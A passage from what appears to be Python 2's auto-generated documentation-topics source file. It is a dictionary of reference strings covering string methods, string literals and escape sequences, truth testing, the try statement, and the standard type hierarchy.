' Split the string at the last occurrence of *sep*, and ' 'return a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. If the ' 'separator is not\n' ' found, return a 3-tuple containing two empty strings, ' 'followed by\n' ' the string itself.\n' '\n' ' New in version 2.5.\n' '\n' 'str.rsplit([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* ' 'as the\n' ' delimiter string. If *maxsplit* is given, at most ' '*maxsplit* splits\n' ' are done, the *rightmost* ones. If *sep* is not ' 'specified or\n' ' "None", any whitespace string is a separator. 
Except ' 'for splitting\n' ' from the right, "rsplit()" behaves like "split()" which ' 'is\n' ' described in detail below.\n' '\n' ' New in version 2.4.\n' '\n' 'str.rstrip([chars])\n' '\n' ' Return a copy of the string with trailing characters ' 'removed. The\n' ' *chars* argument is a string specifying the set of ' 'characters to be\n' ' removed. If omitted or "None", the *chars* argument ' 'defaults to\n' ' removing whitespace. The *chars* argument is not a ' 'suffix; rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.rstrip()\n" " ' spacious'\n" " >>> 'mississippi'.rstrip('ipz')\n" " 'mississ'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* ' 'argument.\n' '\n' 'str.split([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* ' 'as the\n' ' delimiter string. If *maxsplit* is given, at most ' '*maxsplit*\n' ' splits are done (thus, the list will have at most ' '"maxsplit+1"\n' ' elements). If *maxsplit* is not specified or "-1", ' 'then there is\n' ' no limit on the number of splits (all possible splits ' 'are made).\n' '\n' ' If *sep* is given, consecutive delimiters are not ' 'grouped together\n' ' and are deemed to delimit empty strings (for example,\n' ' "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', ' '\'2\']"). The *sep* argument\n' ' may consist of multiple characters (for example,\n' ' "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', ' '\'3\']"). Splitting an\n' ' empty string with a specified separator returns ' '"[\'\']".\n' '\n' ' If *sep* is not specified or is "None", a different ' 'splitting\n' ' algorithm is applied: runs of consecutive whitespace ' 'are regarded\n' ' as a single separator, and the result will contain no ' 'empty strings\n' ' at the start or end if the string has leading or ' 'trailing\n' ' whitespace. 
Consequently, splitting an empty string or ' 'a string\n' ' consisting of just whitespace with a "None" separator ' 'returns "[]".\n' '\n' ' For example, "\' 1 2 3 \'.split()" returns "[\'1\', ' '\'2\', \'3\']", and\n' ' "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', ' '\'2 3 \']".\n' '\n' 'str.splitlines([keepends])\n' '\n' ' Return a list of the lines in the string, breaking at ' 'line\n' ' boundaries. This method uses the *universal newlines* ' 'approach to\n' ' splitting lines. Line breaks are not included in the ' 'resulting list\n' ' unless *keepends* is given and true.\n' '\n' ' For example, "\'ab c\\n\\nde ' 'fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n' ' c\', \'\', \'de fg\', \'kl\']", while the same call ' 'with\n' ' "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de ' 'fg\\r\', \'kl\\r\\n\']".\n' '\n' ' Unlike "split()" when a delimiter string *sep* is ' 'given, this\n' ' method returns an empty list for the empty string, and ' 'a terminal\n' ' line break does not result in an extra line.\n' '\n' 'str.startswith(prefix[, start[, end]])\n' '\n' ' Return "True" if string starts with the *prefix*, ' 'otherwise return\n' ' "False". *prefix* can also be a tuple of prefixes to ' 'look for.\n' ' With optional *start*, test string beginning at that ' 'position.\n' ' With optional *end*, stop comparing string at that ' 'position.\n' '\n' ' Changed in version 2.5: Accept tuples as *prefix*.\n' '\n' 'str.strip([chars])\n' '\n' ' Return a copy of the string with the leading and ' 'trailing\n' ' characters removed. The *chars* argument is a string ' 'specifying the\n' ' set of characters to be removed. If omitted or "None", ' 'the *chars*\n' ' argument defaults to removing whitespace. 
The *chars* ' 'argument is\n' ' not a prefix or suffix; rather, all combinations of its ' 'values are\n' ' stripped:\n' '\n' " >>> ' spacious '.strip()\n" " 'spacious'\n" " >>> 'www.example.com'.strip('cmowz.')\n" " 'example'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* ' 'argument.\n' '\n' 'str.swapcase()\n' '\n' ' Return a copy of the string with uppercase characters ' 'converted to\n' ' lowercase and vice versa.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.title()\n' '\n' ' Return a titlecased version of the string where words ' 'start with an\n' ' uppercase character and the remaining characters are ' 'lowercase.\n' '\n' ' The algorithm uses a simple language-independent ' 'definition of a\n' ' word as groups of consecutive letters. The definition ' 'works in\n' ' many contexts but it means that apostrophes in ' 'contractions and\n' ' possessives form word boundaries, which may not be the ' 'desired\n' ' result:\n' '\n' ' >>> "they\'re bill\'s friends from the UK".title()\n' ' "They\'Re Bill\'S Friends From The Uk"\n' '\n' ' A workaround for apostrophes can be constructed using ' 'regular\n' ' expressions:\n' '\n' ' >>> import re\n' ' >>> def titlecase(s):\n' ' ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n' ' ... lambda mo: ' 'mo.group(0)[0].upper() +\n' ' ... ' 'mo.group(0)[1:].lower(),\n' ' ... s)\n' ' ...\n' ' >>> titlecase("they\'re bill\'s friends.")\n' ' "They\'re Bill\'s Friends."\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.translate(table[, deletechars])\n' '\n' ' Return a copy of the string where all characters ' 'occurring in the\n' ' optional argument *deletechars* are removed, and the ' 'remaining\n' ' characters have been mapped through the given ' 'translation table,\n' ' which must be a string of length 256.\n' '\n' ' You can use the "maketrans()" helper function in the ' '"string"\n' ' module to create a translation table. 
For string ' 'objects, set the\n' ' *table* argument to "None" for translations that only ' 'delete\n' ' characters:\n' '\n' " >>> 'read this short text'.translate(None, 'aeiou')\n" " 'rd ths shrt txt'\n" '\n' ' New in version 2.6: Support for a "None" *table* ' 'argument.\n' '\n' ' For Unicode objects, the "translate()" method does not ' 'accept the\n' ' optional *deletechars* argument. Instead, it returns a ' 'copy of the\n' ' *s* where all characters have been mapped through the ' 'given\n' ' translation table which must be a mapping of Unicode ' 'ordinals to\n' ' Unicode ordinals, Unicode strings or "None". Unmapped ' 'characters\n' ' are left untouched. Characters mapped to "None" are ' 'deleted. Note,\n' ' a more flexible approach is to create a custom ' 'character mapping\n' ' codec using the "codecs" module (see "encodings.cp1251" ' 'for an\n' ' example).\n' '\n' 'str.upper()\n' '\n' ' Return a copy of the string with all the cased ' 'characters [4]\n' ' converted to uppercase. Note that ' '"str.upper().isupper()" might be\n' ' "False" if "s" contains uncased characters or if the ' 'Unicode\n' ' category of the resulting character(s) is not "Lu" ' '(Letter,\n' ' uppercase), but e.g. "Lt" (Letter, titlecase).\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.zfill(width)\n' '\n' ' Return the numeric string left filled with zeros in a ' 'string of\n' ' length *width*. A sign prefix is handled correctly. ' 'The original\n' ' string is returned if *width* is less than or equal to ' '"len(s)".\n' '\n' ' New in version 2.2.2.\n' '\n' 'The following methods are present only on unicode ' 'objects:\n' '\n' 'unicode.isnumeric()\n' '\n' ' Return "True" if there are only numeric characters in ' 'S, "False"\n' ' otherwise. 
Numeric characters include digit characters, ' 'and all\n' ' characters that have the Unicode numeric value ' 'property, e.g.\n' ' U+2155, VULGAR FRACTION ONE FIFTH.\n' '\n' 'unicode.isdecimal()\n' '\n' ' Return "True" if there are only decimal characters in ' 'S, "False"\n' ' otherwise. Decimal characters include digit characters, ' 'and all\n' ' characters that can be used to form decimal-radix ' 'numbers, e.g.\n' ' U+0660, ARABIC-INDIC DIGIT ZERO.\n', 'strings': '\n' 'String literals\n' '***************\n' '\n' 'String literals are described by the following lexical ' 'definitions:\n' '\n' ' stringliteral ::= [stringprefix](shortstring | longstring)\n' ' stringprefix ::= "r" | "u" | "ur" | "R" | "U" | "UR" | "Ur" ' '| "uR"\n' ' | "b" | "B" | "br" | "Br" | "bR" | "BR"\n' ' shortstring ::= "\'" shortstringitem* "\'" | \'"\' ' 'shortstringitem* \'"\'\n' ' longstring ::= "\'\'\'" longstringitem* "\'\'\'"\n' ' | \'"""\' longstringitem* \'"""\'\n' ' shortstringitem ::= shortstringchar | escapeseq\n' ' longstringitem ::= longstringchar | escapeseq\n' ' shortstringchar ::= <any source character except "\\" or ' 'newline or the quote>\n' ' longstringchar ::= <any source character except "\\">\n' ' escapeseq ::= "\\" <any ASCII character>\n' '\n' 'One syntactic restriction not indicated by these productions is ' 'that\n' 'whitespace is not allowed between the "stringprefix" and the rest ' 'of\n' 'the string literal. The source character set is defined by the\n' 'encoding declaration; it is ASCII if no encoding declaration is ' 'given\n' 'in the source file; see section Encoding declarations.\n' '\n' 'In plain English: String literals can be enclosed in matching ' 'single\n' 'quotes ("\'") or double quotes ("""). They can also be enclosed ' 'in\n' 'matching groups of three single or double quotes (these are ' 'generally\n' 'referred to as *triple-quoted strings*). 
The backslash ("\\")\n' 'character is used to escape characters that otherwise have a ' 'special\n' 'meaning, such as newline, backslash itself, or the quote ' 'character.\n' 'String literals may optionally be prefixed with a letter "\'r\'" ' 'or\n' '"\'R\'"; such strings are called *raw strings* and use different ' 'rules\n' 'for interpreting backslash escape sequences. A prefix of "\'u\'" ' 'or\n' '"\'U\'" makes the string a Unicode string. Unicode strings use ' 'the\n' 'Unicode character set as defined by the Unicode Consortium and ' 'ISO\n' '10646. Some additional escape sequences, described below, are\n' 'available in Unicode strings. A prefix of "\'b\'" or "\'B\'" is ' 'ignored in\n' 'Python 2; it indicates that the literal should become a bytes ' 'literal\n' 'in Python 3 (e.g. when code is automatically converted with ' '2to3). A\n' '"\'u\'" or "\'b\'" prefix may be followed by an "\'r\'" prefix.\n' '\n' 'In triple-quoted strings, unescaped newlines and quotes are ' 'allowed\n' '(and are retained), except that three unescaped quotes in a row\n' 'terminate the string. (A "quote" is the character used to open ' 'the\n' 'string, i.e. either "\'" or """.)\n' '\n' 'Unless an "\'r\'" or "\'R\'" prefix is present, escape sequences ' 'in\n' 'strings are interpreted according to rules similar to those used ' 'by\n' 'Standard C. 
The recognized escape sequences are:\n' '\n' '+-------------------+-----------------------------------+---------+\n' '| Escape Sequence | Meaning | Notes ' '|\n' '+===================+===================================+=========+\n' '| "\\newline" | Ignored ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\\\" | Backslash ("\\") ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\\'" | Single quote ("\'") ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\"" | Double quote (""") ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\a" | ASCII Bell (BEL) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\b" | ASCII Backspace (BS) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\f" | ASCII Formfeed (FF) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\n" | ASCII Linefeed (LF) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\N{name}" | Character named *name* in the ' '| |\n' '| | Unicode database (Unicode only) | ' '|\n' '+-------------------+-----------------------------------+---------+\n' '| "\\r" | ASCII Carriage Return (CR) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\t" | ASCII Horizontal Tab (TAB) ' '| |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\uxxxx" | Character with 16-bit hex value | ' '(1) |\n' '| | *xxxx* (Unicode only) | ' '|\n' '+-------------------+-----------------------------------+---------+\n' '| "\\Uxxxxxxxx" | Character with 32-bit hex value | ' '(2) |\n' '| | *xxxxxxxx* (Unicode only) | ' '|\n' '+-------------------+-----------------------------------+---------+\n' '| "\\v" | ASCII Vertical Tab (VT) ' '| |\n' 
'+-------------------+-----------------------------------+---------+\n' '| "\\ooo" | Character with octal value *ooo* | ' '(3,5) |\n' '+-------------------+-----------------------------------+---------+\n' '| "\\xhh" | Character with hex value *hh* | ' '(4,5) |\n' '+-------------------+-----------------------------------+---------+\n' '\n' 'Notes:\n' '\n' '1. Individual code units which form parts of a surrogate pair ' 'can\n' ' be encoded using this escape sequence.\n' '\n' '2. Any Unicode character can be encoded this way, but characters\n' ' outside the Basic Multilingual Plane (BMP) will be encoded ' 'using a\n' ' surrogate pair if Python is compiled to use 16-bit code units ' '(the\n' ' default).\n' '\n' '3. As in Standard C, up to three octal digits are accepted.\n' '\n' '4. Unlike in Standard C, exactly two hex digits are required.\n' '\n' '5. In a string literal, hexadecimal and octal escapes denote the\n' ' byte with the given value; it is not necessary that the byte\n' ' encodes a character in the source character set. In a Unicode\n' ' literal, these escapes denote a Unicode character with the ' 'given\n' ' value.\n' '\n' 'Unlike Standard C, all unrecognized escape sequences are left in ' 'the\n' 'string unchanged, i.e., *the backslash is left in the string*. ' '(This\n' 'behavior is useful when debugging: if an escape sequence is ' 'mistyped,\n' 'the resulting output is more easily recognized as broken.) It is ' 'also\n' 'important to note that the escape sequences marked as "(Unicode ' 'only)"\n' 'in the table above fall into the category of unrecognized escapes ' 'for\n' 'non-Unicode string literals.\n' '\n' 'When an "\'r\'" or "\'R\'" prefix is present, a character ' 'following a\n' 'backslash is included in the string without change, and *all\n' 'backslashes are left in the string*. 
For example, the string ' 'literal\n' '"r"\\n"" consists of two characters: a backslash and a lowercase ' '"\'n\'".\n' 'String quotes can be escaped with a backslash, but the backslash\n' 'remains in the string; for example, "r"\\""" is a valid string ' 'literal\n' 'consisting of two characters: a backslash and a double quote; ' '"r"\\""\n' 'is not a valid string literal (even a raw string cannot end in an ' 'odd\n' 'number of backslashes). Specifically, *a raw string cannot end ' 'in a\n' 'single backslash* (since the backslash would escape the ' 'following\n' 'quote character). Note also that a single backslash followed by ' 'a\n' 'newline is interpreted as those two characters as part of the ' 'string,\n' '*not* as a line continuation.\n' '\n' 'When an "\'r\'" or "\'R\'" prefix is used in conjunction with a ' '"\'u\'" or\n' '"\'U\'" prefix, then the "\\uXXXX" and "\\UXXXXXXXX" escape ' 'sequences are\n' 'processed while *all other backslashes are left in the string*. ' 'For\n' 'example, the string literal "ur"\\u0062\\n"" consists of three ' 'Unicode\n' "characters: 'LATIN SMALL LETTER B', 'REVERSE SOLIDUS', and " "'LATIN\n" "SMALL LETTER N'. Backslashes can be escaped with a preceding\n" 'backslash; however, both remain in the string. As a result, ' '"\\uXXXX"\n' 'escape sequences are only recognized when there are an odd number ' 'of\n' 'backslashes.\n', 'subscriptions': '\n' 'Subscriptions\n' '*************\n' '\n' 'A subscription selects an item of a sequence (string, tuple ' 'or list)\n' 'or mapping (dictionary) object:\n' '\n' ' subscription ::= primary "[" expression_list "]"\n' '\n' 'The primary must evaluate to an object of a sequence or ' 'mapping type.\n' '\n' 'If the primary is a mapping, the expression list must ' 'evaluate to an\n' 'object whose value is one of the keys of the mapping, and ' 'the\n' 'subscription selects the value in the mapping that ' 'corresponds to that\n' 'key. 
(The expression list is a tuple except if it has ' 'exactly one\n' 'item.)\n' '\n' 'If the primary is a sequence, the expression (list) must ' 'evaluate to a\n' 'plain integer. If this value is negative, the length of ' 'the sequence\n' 'is added to it (so that, e.g., "x[-1]" selects the last ' 'item of "x".)\n' 'The resulting value must be a nonnegative integer less than ' 'the number\n' 'of items in the sequence, and the subscription selects the ' 'item whose\n' 'index is that value (counting from zero).\n' '\n' "A string's items are characters. A character is not a " 'separate data\n' 'type but a string of exactly one character.\n', 'truth': '\n' 'Truth Value Testing\n' '*******************\n' '\n' 'Any object can be tested for truth value, for use in an "if" or\n' '"while" condition or as operand of the Boolean operations below. ' 'The\n' 'following values are considered false:\n' '\n' '* "None"\n' '\n' '* "False"\n' '\n' '* zero of any numeric type, for example, "0", "0L", "0.0", "0j".\n' '\n' '* any empty sequence, for example, "\'\'", "()", "[]".\n' '\n' '* any empty mapping, for example, "{}".\n' '\n' '* instances of user-defined classes, if the class defines a\n' ' "__nonzero__()" or "__len__()" method, when that method returns ' 'the\n' ' integer zero or "bool" value "False". [1]\n' '\n' 'All other values are considered true --- so objects of many types ' 'are\n' 'always true.\n' '\n' 'Operations and built-in functions that have a Boolean result ' 'always\n' 'return "0" or "False" for false and "1" or "True" for true, unless\n' 'otherwise stated. 
(Important exception: the Boolean operations ' '"or"\n' 'and "and" always return one of their operands.)\n', 'try': '\n' 'The "try" statement\n' '*******************\n' '\n' 'The "try" statement specifies exception handlers and/or cleanup code\n' 'for a group of statements:\n' '\n' ' try_stmt ::= try1_stmt | try2_stmt\n' ' try1_stmt ::= "try" ":" suite\n' ' ("except" [expression [("as" | ",") identifier]] ":" ' 'suite)+\n' ' ["else" ":" suite]\n' ' ["finally" ":" suite]\n' ' try2_stmt ::= "try" ":" suite\n' ' "finally" ":" suite\n' '\n' 'Changed in version 2.5: In previous versions of Python,\n' '"try"..."except"..."finally" did not work. "try"..."except" had to ' 'be\n' 'nested in "try"..."finally".\n' '\n' 'The "except" clause(s) specify one or more exception handlers. When ' 'no\n' 'exception occurs in the "try" clause, no exception handler is\n' 'executed. When an exception occurs in the "try" suite, a search for ' 'an\n' 'exception handler is started. This search inspects the except ' 'clauses\n' 'in turn until one is found that matches the exception. An ' 'expression-\n' 'less except clause, if present, must be last; it matches any\n' 'exception. For an except clause with an expression, that expression\n' 'is evaluated, and the clause matches the exception if the resulting\n' 'object is "compatible" with the exception. 
An object is compatible\n' 'with an exception if it is the class or a base class of the ' 'exception\n' 'object, or a tuple containing an item compatible with the exception.\n' '\n' 'If no except clause matches the exception, the search for an ' 'exception\n' 'handler continues in the surrounding code and on the invocation ' 'stack.\n' '[1]\n' '\n' 'If the evaluation of an expression in the header of an except clause\n' 'raises an exception, the original search for a handler is canceled ' 'and\n' 'a search starts for the new exception in the surrounding code and on\n' 'the call stack (it is treated as if the entire "try" statement ' 'raised\n' 'the exception).\n' '\n' 'When a matching except clause is found, the exception is assigned to\n' 'the target specified in that except clause, if present, and the ' 'except\n' "clause's suite is executed. All except clauses must have an\n" 'executable block. When the end of this block is reached, execution\n' 'continues normally after the entire try statement. (This means that\n' 'if two nested handlers exist for the same exception, and the ' 'exception\n' 'occurs in the try clause of the inner handler, the outer handler ' 'will\n' 'not handle the exception.)\n' '\n' "Before an except clause's suite is executed, details about the\n" 'exception are assigned to three variables in the "sys" module:\n' '"sys.exc_type" receives the object identifying the exception;\n' '"sys.exc_value" receives the exception\'s parameter;\n' '"sys.exc_traceback" receives a traceback object (see section The\n' 'standard type hierarchy) identifying the point in the program where\n' 'the exception occurred. These details are also available through the\n' '"sys.exc_info()" function, which returns a tuple "(exc_type,\n' 'exc_value, exc_traceback)". Use of the corresponding variables is\n' 'deprecated in favor of this function, since their use is unsafe in a\n' 'threaded program. 
As of Python 1.5, the variables are restored to\n' 'their previous values (before the call) when returning from a ' 'function\n' 'that handled an exception.\n' '\n' 'The optional "else" clause is executed if and when control flows off\n' 'the end of the "try" clause. [2] Exceptions in the "else" clause are\n' 'not handled by the preceding "except" clauses.\n' '\n' 'If "finally" is present, it specifies a \'cleanup\' handler. The ' '"try"\n' 'clause is executed, including any "except" and "else" clauses. If ' 'an\n' 'exception occurs in any of the clauses and is not handled, the\n' 'exception is temporarily saved. The "finally" clause is executed. ' 'If\n' 'there is a saved exception, it is re-raised at the end of the\n' '"finally" clause. If the "finally" clause raises another exception ' 'or\n' 'executes a "return" or "break" statement, the saved exception is\n' 'discarded:\n' '\n' ' >>> def f():\n' ' ... try:\n' ' ... 1/0\n' ' ... finally:\n' ' ... return 42\n' ' ...\n' ' >>> f()\n' ' 42\n' '\n' 'The exception information is not available to the program during\n' 'execution of the "finally" clause.\n' '\n' 'When a "return", "break" or "continue" statement is executed in the\n' '"try" suite of a "try"..."finally" statement, the "finally" clause ' 'is\n' 'also executed \'on the way out.\' A "continue" statement is illegal ' 'in\n' 'the "finally" clause. (The reason is a problem with the current\n' 'implementation --- this restriction may be lifted in the future).\n' '\n' 'The return value of a function is determined by the last "return"\n' 'statement executed. Since the "finally" clause always executes, a\n' '"return" statement executed in the "finally" clause will always be ' 'the\n' 'last one executed:\n' '\n' ' >>> def foo():\n' ' ... try:\n' " ... return 'try'\n" ' ... finally:\n' " ... 
return 'finally'\n" ' ...\n' ' >>> foo()\n' " 'finally'\n" '\n' 'Additional information on exceptions can be found in section\n' 'Exceptions, and information on using the "raise" statement to ' 'generate\n' 'exceptions may be found in section The raise statement.\n', 'types': '\n' 'The standard type hierarchy\n' '***************************\n' '\n' 'Below is a list of the types that are built into Python. ' 'Extension\n' 'modules (written in C, Java, or other languages, depending on the\n' 'implementation) can define additional types. Future versions of\n' 'Python may add types to the type hierarchy (e.g., rational ' 'numbers,\n' 'efficiently stored arrays of integers, etc.).\n' '\n' 'Some of the type descriptions below contain a paragraph listing\n' "'special attributes.' These are attributes that provide access to " 'the\n' 'implementation and are not intended for general use. Their ' 'definition\n' 'may change in the future.\n' '\n' 'None\n' ' This type has a single value. There is a single object with ' 'this\n' ' value. This object is accessed through the built-in name "None". ' 'It\n' ' is used to signify the absence of a value in many situations, ' 'e.g.,\n' " it is returned from functions that don't explicitly return\n" ' anything. Its truth value is false.\n' '\n' 'NotImplemented\n' ' This type has a single value. There is a single object with ' 'this\n' ' value. This object is accessed through the built-in name\n' ' "NotImplemented". Numeric methods and rich comparison methods ' 'may\n' ' return this value if they do not implement the operation for ' 'the\n' ' operands provided. (The interpreter will then try the ' 'reflected\n' ' operation, or some other fallback, depending on the operator.) ' 'Its\n' ' truth value is true.\n' '\n' 'Ellipsis\n' ' This type has a single value. There is a single object with ' 'this\n' ' value. This object is accessed through the built-in name\n' ' "Ellipsis". It is used to indicate the presence of the "..." 
' 'syntax\n' ' in a slice. Its truth value is true.\n' '\n' '"numbers.Number"\n' ' These are created by numeric literals and returned as results ' 'by\n' ' arithmetic operators and arithmetic built-in functions. ' 'Numeric\n' ' objects are immutable; once created their value never changes.\n' ' Python numbers are of course strongly related to mathematical\n' ' numbers, but subject to the limitations of numerical ' 'representation\n' ' in computers.\n' '\n' ' Python distinguishes between integers, floating point numbers, ' 'and\n' ' complex numbers:\n' '\n' ' "numbers.Integral"\n' ' These represent elements from the mathematical set of ' 'integers\n' ' (positive and negative).\n' '\n' ' There are three types of integers:\n' '\n' ' Plain integers\n' ' These represent numbers in the range -2147483648 through\n' ' 2147483647. (The range may be larger on machines with a\n' ' larger natural word size, but not smaller.) When the ' 'result\n' ' of an operation would fall outside this range, the result ' 'is\n' ' normally returned as a long integer (in some cases, the\n' ' exception "OverflowError" is raised instead). For the\n' ' purpose of shift and mask operations, integers are assumed ' 'to\n' " have a binary, 2's complement notation using 32 or more " 'bits,\n' ' and hiding no bits from the user (i.e., all 4294967296\n' ' different bit patterns correspond to different values).\n' '\n' ' Long integers\n' ' These represent numbers in an unlimited range, subject to\n' ' available (virtual) memory only. For the purpose of ' 'shift\n' ' and mask operations, a binary representation is assumed, ' 'and\n' " negative numbers are represented in a variant of 2's\n" ' complement which gives the illusion of an infinite string ' 'of\n' ' sign bits extending to the left.\n' '\n' ' Booleans\n' ' These represent the truth values False and True. The two\n' ' objects representing the values "False" and "True" are ' 'the\n' ' only Boolean objects. 
The Boolean type is a subtype of ' 'plain\n' ' integers, and Boolean values behave like the values 0 and ' '1,\n' ' respectively, in almost all contexts, the exception being\n' ' that when converted to a string, the strings ""False"" or\n' ' ""True"" are returned, respectively.\n' '\n' ' The rules for integer representation are intended to give ' 'the\n' ' most meaningful interpretation of shift and mask operations\n' ' involving negative integers and the least surprises when\n' ' switching between the plain and long integer domains. Any\n' ' operation, if it yields a result in the plain integer ' 'domain,\n' ' will yield the same result in the long integer domain or ' 'when\n' ' using mixed operands. The switch between domains is ' 'transparent\n' ' to the programmer.\n' '\n' ' "numbers.Real" ("float")\n' ' These represent machine-level double precision floating ' 'point\n' ' numbers. You are at the mercy of the underlying machine\n' ' architecture (and C or Java implementation) for the accepted\n' ' range and handling of overflow. Python does not support ' 'single-\n' ' precision floating point numbers; the savings in processor ' 'and\n' ' memory usage that are usually the reason for using these are\n' ' dwarfed by the overhead of using objects in Python, so there ' 'is\n' ' no reason to complicate the language with two kinds of ' 'floating\n' ' point numbers.\n' '\n' ' "numbers.Complex"\n' ' These represent complex numbers as a pair of machine-level\n' ' double precision floating point numbers. The same caveats ' 'apply\n' ' as for floating point numbers. The real and imaginary parts ' 'of a\n' ' complex number "z" can be retrieved through the read-only\n' ' attributes "z.real" and "z.imag".\n' '\n' 'Sequences\n' ' These represent finite ordered sets indexed by non-negative\n' ' numbers. The built-in function "len()" returns the number of ' 'items\n' ' of a sequence. 
When the length of a sequence is *n*, the index ' 'set\n' ' contains the numbers 0, 1, ..., *n*-1. Item *i* of sequence *a* ' 'is\n' ' selected by "a[i]".\n' '\n' ' Sequences also support slicing: "a[i:j]" selects all items with\n' ' index *k* such that *i* "<=" *k* "<" *j*. When used as an\n' ' expression, a slice is a sequence of the same type. This ' 'implies\n' ' that the index set is renumbered so that it starts at 0.\n' '\n' ' Some sequences also support "extended slicing" with a third ' '"step"\n' ' parameter: "a[i:j:k]" selects all items of *a* with index *x* ' 'where\n' ' "x = i + n*k", *n* ">=" "0" and *i* "<=" *x* "<" *j*.\n' '\n' ' Sequences are distinguished according to their mutability:\n' '\n' ' Immutable sequences\n' ' An object of an immutable sequence type cannot change once it ' 'is\n' ' created. (If the object contains references to other ' 'objects,\n' ' these other objects may be mutable and may be changed; ' 'however,\n' ' the collection of objects directly referenced by an ' 'immutable\n' ' object cannot change.)\n' '\n' ' The following types are immutable sequences:\n' '\n' ' Strings\n' ' The items of a string are characters. There is no ' 'separate\n' ' character type; a character is represented by a string of ' 'one\n' ' item. Characters represent (at least) 8-bit bytes. The\n' ' built-in functions "chr()" and "ord()" convert between\n' ' characters and nonnegative integers representing the byte\n' ' values. Bytes with the values 0-127 usually represent ' 'the\n' ' corresponding ASCII values, but the interpretation of ' 'values\n' ' is up to the program. 
The string data type is also used ' 'to\n' ' represent arrays of bytes, e.g., to hold data read from a\n' ' file.\n' '\n' ' (On systems whose native character set is not ASCII, ' 'strings\n' ' may use EBCDIC in their internal representation, provided ' 'the\n' ' functions "chr()" and "ord()" implement a mapping between\n' ' ASCII and EBCDIC, and string comparison preserves the ' 'ASCII\n' ' order. Or perhaps someone can propose a better rule?)\n' '\n' ' Unicode\n' ' The items of a Unicode object are Unicode code units. A\n' ' Unicode code unit is represented by a Unicode object of ' 'one\n' ' item and can hold either a 16-bit or 32-bit value\n' ' representing a Unicode ordinal (the maximum value for the\n' ' ordinal is given in "sys.maxunicode", and depends on how\n' ' Python is configured at compile time). Surrogate pairs ' 'may\n' ' be present in the Unicode object, and will be reported as ' 'two\n' ' separate items. The built-in functions "unichr()" and\n' ' "ord()" convert between code units and nonnegative ' 'integers\n' ' representing the Unicode ordinals as defined in the ' 'Unicode\n' ' Standard 3.0. Conversion from and to other encodings are\n' ' possible through the Unicode method "encode()" and the ' 'built-\n' ' in function "unicode()".\n' '\n' ' Tuples\n' ' The items of a tuple are arbitrary Python objects. Tuples ' 'of\n' ' two or more items are formed by comma-separated lists of\n' " expressions. A tuple of one item (a 'singleton') can be\n" ' formed by affixing a comma to an expression (an expression ' 'by\n' ' itself does not create a tuple, since parentheses must be\n' ' usable for grouping of expressions). An empty tuple can ' 'be\n' ' formed by an empty pair of parentheses.\n' '\n' ' Mutable sequences\n' ' Mutable sequences can be changed after they are created. 
' 'The\n' ' subscription and slicing notations can be used as the target ' 'of\n' ' assignment and "del" (delete) statements.\n' '\n' ' There are currently two intrinsic mutable sequence types:\n' '\n' ' Lists\n' ' The items of a list are arbitrary Python objects. Lists ' 'are\n' ' formed by placing a comma-separated list of expressions ' 'in\n' ' square brackets. (Note that there are no special cases ' 'needed\n' ' to form lists of length 0 or 1.)\n' '\n' ' Byte Arrays\n' ' A bytearray object is a mutable array. They are created ' 'by\n' ' the built-in "bytearray()" constructor. Aside from being\n' ' mutable (and hence unhashable), byte arrays otherwise ' 'provide\n' ' the same interface and functionality as immutable bytes\n' ' objects.\n' '\n' ' The extension module "array" provides an additional example ' 'of a\n' ' mutable sequence type.\n' '\n' 'Set types\n' ' These represent unordered, finite sets of unique, immutable\n' ' objects. As such, they cannot be indexed by any subscript. ' 'However,\n' ' they can be iterated over, and the built-in function "len()"\n' ' returns the number of items in a set. Common uses for sets are ' 'fast\n' ' membership testing, removing duplicates from a sequence, and\n' ' computing mathematical operations such as intersection, union,\n' ' difference, and symmetric difference.\n' '\n' ' For set elements, the same immutability rules apply as for\n' ' dictionary keys. Note that numeric types obey the normal rules ' 'for\n' ' numeric comparison: if two numbers compare equal (e.g., "1" and\n' ' "1.0"), only one of them can be contained in a set.\n' '\n' ' There are currently two intrinsic set types:\n' '\n' ' Sets\n' ' These represent a mutable set. They are created by the ' 'built-in\n' ' "set()" constructor and can be modified afterwards by ' 'several\n' ' methods, such as "add()".\n' '\n' ' Frozen sets\n' ' These represent an immutable set. They are created by the\n' ' built-in "frozenset()" constructor. 
